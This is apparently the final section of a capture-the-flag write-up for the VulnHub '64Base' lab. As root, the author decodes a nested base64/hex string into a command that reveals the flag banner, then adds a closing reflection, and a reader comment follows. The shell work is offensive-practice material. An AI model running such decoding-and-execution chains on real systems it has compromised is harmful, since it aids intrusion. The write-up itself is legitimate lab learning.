root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d 4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo= root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d 596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg== root@64base:~# echo 'NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK' | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d base64 -d /var/local/.luke|less.real |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
root@64base:~# base64 -d /var/local/.luke|less.real -----SNIP----- ____________________________________________________________________________ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| _ _ ____ __ __ __ __ ____ _ _ _ _____ ______ | \ | | / __ \\ \ / / \ \ / // __ \ | | | |( )| __ \ | ____| | \| || | | |\ \ /\ / / \ \_/ /| | | || | | ||/ | |__) || |__ | . ` || | | | \ \/ \/ / \ / | | | || | | | | _ / | __| | |\ || |__| | \ /\ / | | | |__| || |__| | | | \ \ | |____ |_| \_| \____/ \/ \/ |_| \____/ \____/ |_| \_\|______| _ ______ _____ _____ _ /\ | || ____|| __ \|_ _|| | / \ | || |__ | | | | | | | | / /\ \ _ | || __| | | | | | | | | / ____ \ | |__| || |____ | |__| |_| |_ |_| /_/ \_\ \____/ |______||_____/|_____|(_) ______ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| I hope you enjoyed this challenge Please leave comments & feedback @ https://www.vulnhub.com/?q=64base ----------------------------------- 64Base Challenge by 3mrgnc3 https://3mrgnc3.ninja/challenges ----------------------------------- |
Conclusion
This was an awesome challenge which had a lot of tricks up its sleeve.
When I finally thought I was on the right track I hit a dead end. After a while it felt like a maze in which I needed to find my way.
A great job of building this challenge and many thanks to 3mrgnc3 and vulnhub.com.
Can’t wait for the next challenge.
A great read.
It is not my first time to go to see this web site, i am visiting this web site dailly and obtain good information from here all the time.